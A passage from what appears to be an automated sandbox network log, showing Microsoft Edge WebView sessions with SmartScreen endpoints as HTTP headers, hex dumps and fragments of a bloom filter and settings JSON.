                                                                                                                                                                                                                2024-03-10 16:46:12 UTC754OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC252INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:13 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 460992
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Server: Kestrel
                                                                                                                                                                                                                ETag: "638004170464094982"
                                                                                                                                                                                                                Request-Context: appId=cid-v1:46ea1a4d-29cb-4e7e-a1ff-735721467fe3
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16132INData Raw: 00 01 b7 32 6c 49 bd 35 18 3c 43 00 3b d3 7b 9a 00 08 16 f5 5f 2b 6a 45 e7 a6 60 9a c2 7d 9c 16 00 0c 2d 9e cc 04 23 e9 41 f4 82 16 a9 4b 52 db 00 0c 6c e3 4d 30 2c 73 87 bc fb 29 94 39 d4 c2 00 0c b4 d9 e2 eb e5 8f d8 b5 78 ca fa c6 82 9e 00 0c da 46 f1 62 1d cd 1e ab c5 cd 6a 55 ed dc 00 0e 79 d2 8a 68 27 a0 d5 e5 e5 89 bf 4c 3c 1f 00 12 2a 1f c4 5a 99 f8 2a 25 e9 2a 92 1a f6 5f 00 14 b2 67 12 34 79 75 12 bc d6 99 a8 99 1c cc 00 14 c8 bf 10 27 63 3d b9 cd 49 30 99 bf d3 a1 00 17 f8 9d 81 a3 94 71 57 f8 bf 3c 3a 4e ba d2 00 1a 3c bc a6 55 f9 2c 4d 69 94 e9 c9 5f b9 8c 00 1f 17 b3 27 28 0e f5 55 df 39 10 21 05 ce 96 00 1f bc ff bf d8 75 92 d1 13 89 37 0b 86 dc 34 00 20 98 bc 45 61 f8 b8 0d 34 2e 2b fb 37 39 6b 00 21 54 ca 2d 35 57 fb 9f 21 b8 d7 9a 40 2b
                                                                                                                                                                                                                Data Ascii: 2lI5<C;{_+jE`}-#AKRlM0,s)9xFbjUyh'L<*Z*%*_g4yu'c=I0qW<:N<U,Mi_'(U9!u74 Ea4.+79k!T-5W!@+
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: b8 6c 65 b5 81 d7 e8 96 a2 f6 fb f5 08 e9 4a 27 41 5a ef 9e 20 88 b1 dd 92 43 f1 c7 08 f6 31 2a b4 6b b0 d0 7b af f2 6e c0 3b 30 49 08 f7 14 46 2e c2 8e a1 9b 56 f6 89 ff 89 a1 a1 08 f8 86 49 94 74 f7 df c7 92 d3 f1 d5 09 db a4 08 f9 bb 85 2c 48 b7 6a b2 fe 9c 06 4c 91 ba af 08 fb 12 e5 67 95 f2 51 95 31 42 c4 14 92 6c 77 08 fb aa 20 c5 0c 96 4a 9a 6f 2e 40 d4 2b fd 90 08 fe aa 92 f9 b3 b3 8f b8 65 27 9b b9 df 14 f7 09 00 34 db 44 0d dd 66 70 53 8f 0b 31 18 8b ba 09 05 38 28 fa 80 5f eb 56 83 46 d1 dd 83 34 b7 09 06 35 0d 42 c1 3f 91 ee 97 ed f4 31 68 37 32 09 08 35 c9 14 24 10 2f b5 80 ac f7 9a 16 e6 e2 09 08 7a 82 38 a3 08 0b 00 2c 62 9c d0 2e d2 c4 09 09 d1 da a7 a8 16 cd 89 e5 ac fe b9 cc 8e 69 09 0e 20 d3 38 58 e2 6b 84 a1 e7 75 97 ad 75 61 09 0e 4d
                                                                                                                                                                                                                Data Ascii: leJ'AZ C1*k{n;0IF.VIt,HjLgQ1Blw Jo.@+e'4DfpS18(_VF45B?1h725$/z8,b.i 8XkuuaM
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: 88 ca 0d 74 ff b7 03 d5 0b 17 29 2e 12 86 39 8d 65 51 d1 6b 43 f6 37 a6 5e 4e 7e d5 12 8c a6 4c a1 b4 9a f4 6b 69 49 eb 0d 33 90 eb 12 8f 60 36 ec 98 cd 7f 6a 59 fe c5 d1 d5 4b 38 12 92 da 96 3e 8a fd ee fb c5 ac d0 29 b4 8e 13 12 95 25 87 d8 33 f2 c0 16 e8 0f 63 67 d6 78 d1 12 96 03 01 99 d8 95 ea 2c 0a f8 85 62 05 db 93 12 96 52 aa 59 60 de e6 e9 8c 23 d4 b7 c1 34 3d 12 96 bf ae d0 b9 c2 92 db f1 41 07 61 b1 82 5d 12 97 53 89 b5 7c fd 88 82 19 c7 b1 b0 0f af ed 12 98 30 32 6a a5 03 4e 26 db 95 be 1b a9 a3 e2 12 9a ea fe 35 92 c8 f4 3b 7a 18 36 80 cb 78 bf 12 9b 33 a3 9e d9 7b 54 c8 7b da 3b ed a8 dd 25 12 9b 98 d3 83 cc 49 8e 52 58 13 7e 3f 04 d9 af 12 9c 0d 11 dc 93 65 32 c4 f0 f6 a9 12 25 13 25 12 9c 28 31 10 8a f9 38 40 df 1f 08 9f 08 d4 71 12 9f 71
                                                                                                                                                                                                                Data Ascii: t).9eQkC7^N~LkiI3`6jYK8>)%3cgx,bRY`#4=Aa]S|02jN&5;z6x3{T{;%IRX~?e2%%(18@qq
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: 8c e6 1b 88 d1 53 7d a1 f2 bc f6 d3 1b bd 38 be aa 88 bb f2 1c 05 de ac 2c b3 63 c3 1b bf d8 bc e5 a8 4c 42 a1 5e 7d 76 56 07 18 dd 1b c1 05 6e 7a a0 f3 27 8e eb 4f 29 e6 e0 a0 2a 1b c2 a1 45 60 4f 19 d0 fa 94 66 c2 31 56 e0 ac 1b c3 58 61 04 7c 91 76 1b 27 0c 2e 05 4d 26 17 1b c4 0f 81 e0 48 ff 13 e9 e7 fd ae 77 76 47 85 1b c5 d5 9a 68 ef 46 53 52 de 8b 1c 3a 7b 4f 53 1b cc c2 c4 df 4d dc 18 9f 1a a6 aa 47 f5 9f 2e 1b cd 8c 32 11 55 08 6c 9c 2f 0b 09 34 58 ca d2 1b cf 2c 48 15 0b dd b9 a9 cc 90 e8 14 76 e1 c7 1b d1 50 e1 1f 03 b2 ff 0f ab b3 c3 a2 cf c2 1a 1b d6 7a 97 41 b9 a0 2a 37 7b ba 9a 0a 00 47 56 1b da a2 08 31 23 96 3c 24 0a b0 10 2f 5e b6 c3 1b dc 15 6b ce f9 b8 64 db f8 fb 84 2a d6 02 9b 1b dc 58 1e e3 44 3f fb c2 e7 7f 97 d4 41 5f 1c 1b dc 83
                                                                                                                                                                                                                Data Ascii: S}8,cLB^}vVnz'O)*E`Of1VXa|v'.M&HwvGhFSR:{OSMG.2Ul/4X,HvPzA*7{GV1#<$/^kd*XD?A_
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: 9c f0 8f 05 68 32 cf 23 af 0f e9 31 25 17 e2 83 8c a0 e0 45 41 22 69 ae 51 16 97 9e 25 19 94 88 65 65 22 da 5c e4 68 67 07 cf 5f 7a 25 1e 6a 2e 6e bf 40 39 a7 91 dd 9f 82 5c b4 be 25 21 01 14 90 ab fe fa c5 d4 0a 62 0b cd 30 e1 25 21 03 7a 48 db 3d 1f b8 bc 66 91 12 c8 41 7f 25 24 00 6f 09 69 7b 22 bc d0 5a 82 9d c8 cb 00 25 24 76 95 60 1f 20 bf 51 8e ef 43 af 74 27 17 25 24 d0 90 ec 4d 35 f3 3b 75 d1 b6 56 62 63 3e 25 25 bd 14 86 f0 f0 dc 12 c9 55 32 f1 85 66 4f 25 25 de ea a2 0c 7b b9 31 02 c3 fc 10 0f 92 23 25 27 0a 2e 12 37 63 79 36 e7 03 6f 4c 1e 67 7e 25 29 ef 20 dd 60 cb e0 1f 91 82 96 c4 38 ef d3 25 2c 0d 19 1e 65 a3 27 9b 58 e2 44 e3 80 93 37 25 2c e2 18 e3 78 51 0e b2 f9 62 26 e5 78 8f 9f 25 36 84 bd bb 8f cc a6 bc 42 a8 bf 22 b0 f1 a9 25 3a 54
                                                                                                                                                                                                                Data Ascii: h2#1%EA"iQ%ee"\hg_z%j.n@9\%!b0%!zH=fA%$oi{"Z%$v` QCt'%$M5;uVbc>%%U2fO%%{1#%'.7cy6oLg~%) `8%,e'XD7%,xQb&x%6B"%:T
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: b6 07 8f 44 9d 29 36 4f 29 8a 7d 80 2e 1d 98 b7 c7 17 54 cd a1 2b c2 e9 29 21 98 f9 2e 1f 4a 0d ee 13 3f 5a 00 ff e7 0d f0 d4 1c 86 2e 21 27 d4 ff 4a 83 22 1e 86 3f 93 6b 62 a1 0e 2e 25 e1 37 a1 70 d4 f6 b3 17 bd e9 dd 8d 2a 44 2e 26 32 0d f4 82 4c f6 14 9e 97 92 23 fa 52 37 2e 2a 40 96 f4 4d 34 89 21 f2 49 39 e8 d3 d3 19 2e 2b ef 39 f1 8a 4a 7e 28 b9 d0 be 00 6f 35 68 2e 2e 95 d3 bd e3 e7 a0 d6 d0 25 5e 0d b7 b5 a5 2e 31 ce 53 a9 54 e0 3b 3c 2f fc 4d eb 0f a5 e1 2e 33 1e 46 e8 3a 01 30 91 17 49 f3 33 11 46 79 2e 36 b7 bb 07 e4 6d 92 d5 42 49 d7 e5 49 f4 85 2e 36 e8 96 57 36 97 bb 40 7a 3b ca 8a e0 7e 53 2e 3a 1e f2 97 75 d6 ae 4f f5 85 eb 36 38 65 e5 2e 3a 59 df c9 6e 75 92 ac 40 ac 59 a6 fd e4 1c 2e 3b 8e 5c 94 1d 75 39 54 06 13 6b 6e 7f ef 30 2e 43 e8
                                                                                                                                                                                                                Data Ascii: D)6O)}.T+)!.J?Z.!'J"?kb.%7p*D.&2L#R7.*@M4!I9.+9J~(o5h..%^.1ST;</M.3F:0I3Fy.6mBII.6W6@z;~S.:uO68e.:Ynu@Y.;\u9Tkn0.C
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: 02 f3 ca e4 05 cb a0 be 15 69 62 32 37 3c 37 3b db 81 8a b2 df cf ef b1 79 3f f8 ae 37 3d a3 01 e8 95 76 a1 63 78 77 2e 93 42 3d 4f 37 3e c4 08 a5 37 4f 84 43 dc 19 00 a9 8f 2e 0d 37 3f 82 55 cb cd 06 b9 0c 0d 94 f9 4f d6 82 e8 37 44 09 28 b8 33 ef b7 ee 6b 4c 90 ee e0 d1 3a 37 44 83 9a 56 2d 6a 58 ea 6b e5 8f 6a 1d 17 23 37 47 0f 55 f8 2b 1c 30 89 3a 1d e2 21 89 b7 42 37 4b 86 38 d0 cd 9f 96 62 d8 da bf d5 15 ed cb 37 4e 81 34 2b 0e ea ab 6f ae 29 15 59 32 ae 46 37 50 d2 0c 2a e2 ca 59 ec 21 86 70 f9 7a 6c d1 37 55 32 b2 91 f0 e7 b8 47 d0 f7 0f 64 90 d9 51 37 56 ce 44 24 61 58 d7 f8 d4 0d 8b fe 3d b0 27 37 58 1f 24 d2 a5 24 9c d7 5c 5a 71 f9 e9 f2 a3 37 58 9d d0 f0 06 3a 05 be 08 d9 90 bc 18 0d 71 37 5d 04 71 81 05 8e b6 9b 24 f2 54 35 1b 18 46 37 62 eb
                                                                                                                                                                                                                Data Ascii: ib27<7;y?7=vcxw.B=O7>7OC.7?UO7D(3kL:7DV-jXkj#7GU+0:!B7K8b7N4+o)Y2F7P*Y!pzl7U2GdQ7VD$aX='7X$$\Zq7X:q7]q$T5F7b
                                                                                                                                                                                                                2024-03-10 16:46:14 UTC16384INData Raw: 30 9b b9 2f 98 88 40 3b cc 98 d2 59 40 6d c4 d7 67 2a f1 8a f6 d5 d3 92 a9 c6 13 1d 40 71 5f 29 26 14 e2 86 f2 b1 3c d6 fc 07 07 4a 40 77 d4 86 06 be 80 6f b2 fd e4 19 fe 6b 6a 94 40 78 4d f5 b9 67 58 78 83 29 63 04 29 22 98 8d 40 7a 85 3f 10 18 78 19 d3 be 45 8d 0e 49 7b bb 40 7b 5d c5 55 97 e5 9d 35 9d 27 93 51 1d be 21 40 7d 42 88 f1 ca 9d ba 2a 28 3a f8 72 71 ba c7 40 7e 4d cf f4 13 b8 8f f1 9c e6 e4 a8 50 74 d0 40 80 bb 51 db 04 52 b7 b2 f3 5f dc db 6d 4b de 40 88 e2 91 a0 6c 67 8c d2 0b 9f d2 91 ca 6d 22 40 8a b9 d3 6a f9 07 64 05 ea 52 dc 44 82 0b 38 40 8b 54 ce 67 df 8c a3 48 2d 96 f6 ed e4 cf 78 40 8e 78 fd f9 d7 db ac 12 a0 80 27 db 9f 14 42 40 90 00 78 66 ff 66 2b 58 9f 18 13 aa 3d 6e b3 40 90 fa a1 0b 8e ee 2b 73 4b 59 c6 c9 b1 84 9b 40 93 53
                                                                                                                                                                                                                Data Ascii: 0/@;Y@mg*@q_)&<J@wokj@xMgXx)c)"@z?xEI{@{]U5'Q!@}B*(:rq@~MPt@QR_mK@lgm"@jdRD8@TgH-x@x'B@xff+X=n@+sKY@S
                                                                                                                                                                                                                2024-03-10 16:46:14 UTC16384INData Raw: 66 82 7d 26 60 5e 84 ec 72 2a af 39 49 bb 12 c2 0a 6a 68 a1 f1 aa 3c 93 f9 79 13 0e 49 bb 81 dd 8c 7e 5d 19 6b 54 60 33 c1 1e 70 56 49 bc df 84 ed 14 a3 5d 07 06 25 84 6a 95 02 e0 49 bd eb 48 24 83 1e f1 e0 29 fe 9e e6 22 da 07 49 c1 2d 65 e8 79 f6 32 c8 9b 5b 3f 1a a8 9d b9 49 c4 33 af 97 7a e9 a1 ba ed 12 d0 a3 40 1e 42 49 c5 09 f1 9f 2c bb 61 75 14 cf 80 9c 0e 85 9e 49 c8 81 16 cb ae 60 54 25 eb 75 fe e4 b5 16 8c 49 cc 62 7c 10 80 46 f7 71 86 18 7b bd ea 45 5f 49 cd ad e9 e7 ee e9 a2 7e 24 2e 10 93 70 b0 ad 49 d1 bc ac 01 05 b1 9b be b4 f8 4e e6 0c 0d ac 49 d2 4b be 25 0a bd 70 d0 f7 10 c2 d7 38 8b f2 49 d4 c5 71 4c 7f 7a 2a 83 c3 c3 50 d2 c2 4c 3e 49 d5 40 eb ee b7 40 f4 16 fe b4 e7 35 d0 25 e3 49 d6 e7 89 68 04 ba a1 f5 37 3f 51 0a 5e cc 25 49 da b4
                                                                                                                                                                                                                Data Ascii: f}&`^r*9Ijh<yI~]kT`3pVI]%jIH$)"I-ey2[?I3z@BI,auI`T%uIb|Fq{E_I~$.pINIK%p8IqLz*PL>I@@5%Ih7?Q^%I


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                11192.168.2.44976520.25.227.1744433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:15 UTC723OUTPOST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1
                                                                                                                                                                                                                Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Length: 754
                                                                                                                                                                                                                Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                Authorization: SmartScreenHash eyJhdXRoSWQiOiJjMmU0ZjljYS1lZjYwLTQyY2EtOTAyZi1mNzgwZTFmMTk2YTciLCAia2V5IjoickpZVUI4c044UXlRVXRxMHIwTEhodz09IiwgImhhc2giOiJldU5uM2lBWkJtaz0ifQ==
                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                If-None-Match: "636976985063396749.rel.v2"
                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                2024-03-10 16:46:15 UTC754OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                2024-03-10 16:46:15 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:15 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 57
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Server: Kestrel
                                                                                                                                                                                                                ETag: "638343870221005468"
                                                                                                                                                                                                                Request-Context: appId=cid-v1:46ea1a4d-29cb-4e7e-a1ff-735721467fe3
                                                                                                                                                                                                                2024-03-10 16:46:15 UTC57INData Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d
                                                                                                                                                                                                                Data Ascii: 9murmur3,MhZ8\<&LiH[?m


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                12192.168.2.44976720.25.227.1744433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:17 UTC698OUTPOST /api/browser/edge/data/settings/3 HTTP/1.1
                                                                                                                                                                                                                Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Length: 726
                                                                                                                                                                                                                Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                Authorization: SmartScreenHash eyJhdXRoSWQiOiJjMmU0ZjljYS1lZjYwLTQyY2EtOTAyZi1mNzgwZTFmMTk2YTciLCAia2V5IjoiRWMrdUZuNGZ4ckVyaVBIMHdIRmlwQT09IiwgImhhc2giOiJLR3dVeWR3bUdxST0ifQ==
                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                If-None-Match: "2.0-0"
                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                2024-03-10 16:46:17 UTC726OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                2024-03-10 16:46:17 UTC302INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:17 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 130439
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Server: Kestrel
                                                                                                                                                                                                                ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1"
                                                                                                                                                                                                                Request-Context: appId=cid-v1:46ea1a4d-29cb-4e7e-a1ff-735721467fe3
                                                                                                                                                                                                                2024-03-10 16:46:17 UTC16082INData Raw: 7b 0d 0a 20 20 22 67 65 6f 69 64 4d 61 70 73 22 3a 20 7b 0d 0a 20 20 20 20 22 61 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 75 73 74 72 61 6c 69 61 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 63 68 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 77 69 74 7a 65 72 6c 61 6e 64 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 65 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 70 65 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 66 66 6c 34 22 3a 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 74 65 64 73 74 61 74 65 73 31 2e 73 73 2e 77 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 75 73 2f 22 2c 0d 0a
                                                                                                                                                                                                                Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
                                                                                                                                                                                                                2024-03-10 16:46:17 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 30 39 63 34 37 36 32 37 62 63 35 33 33 62 35 39 32 34 61 30 35 35 61 30 34 62 63 34 63 33 33 65 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 39 2e 35 38 33 34 34 30 31 37 37 34 34 37 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 36 33 34 65 62 32 30 64 62 35 30 38 65 33 61 33 31 62 36 31 34 38 31 61 32 35 31 62 66 39 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 33 33 37 30 36 38 35 39 32 37 38 32 37 33 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                Data Ascii: { "key": "09c47627bc533b5924a055a04bc4c33e", "value": 9.58344017744784 }, { "key": "e634eb20db508e3a31b61481a251bf93", "value": -0.337068592782735
                                                                                                                                                                                                                2024-03-10 16:46:17 UTC16384INData Raw: 30 37 37 37 34 37 33 33 30 39 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 31 32 62 62 65 66 63 30 35 64 35 31 34 32 65 37 65 62 36 38 36 66 61 64 38 64 65 61 39 32 31 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 35 37 31 37 37 35 33 31 31 38 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 65 35 66 62 38 64 66 31 32 35 61 34 37 32 31 64 31 64 66 33 32 38 62 63 36 66 32 64 64 65 61 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a
                                                                                                                                                                                                                Data Ascii: 07774733095 }, { "key": "12bbefc05d5142e7eb686fad8dea9211", "value": -1.05717753118094 }, { "key": "ce5fb8df125a4721d1df328bc6f2ddea", "value":
                                                                                                                                                                                                                2024-03-10 16:46:17 UTC16384INData Raw: 20 2d 31 2e 39 30 31 33 34 36 37 39 37 33 36 34 32 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 66 32 33 35 64 63 66 36 62 34 32 39 62 61 34 31 36 64 63 65 37 34 64 34 62 36 66 62 63 34 37 62 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 31 2e 32 36 30 31 38 31 31 38 35 36 30 38 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 38 66 31 37 64 37 34 30 33 61 63 35 66 66 32 38 39 36 61 37 31 33 61 37 31 37 35 65 64 31 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61
                                                                                                                                                                                                                Data Ascii: -1.9013467973642 }, { "key": "f235dcf6b429ba416dce74d4b6fbc47b", "value": 1.26018118560884 }, { "key": "c8f17d7403ac5ff2896a713a7175ed19", "va
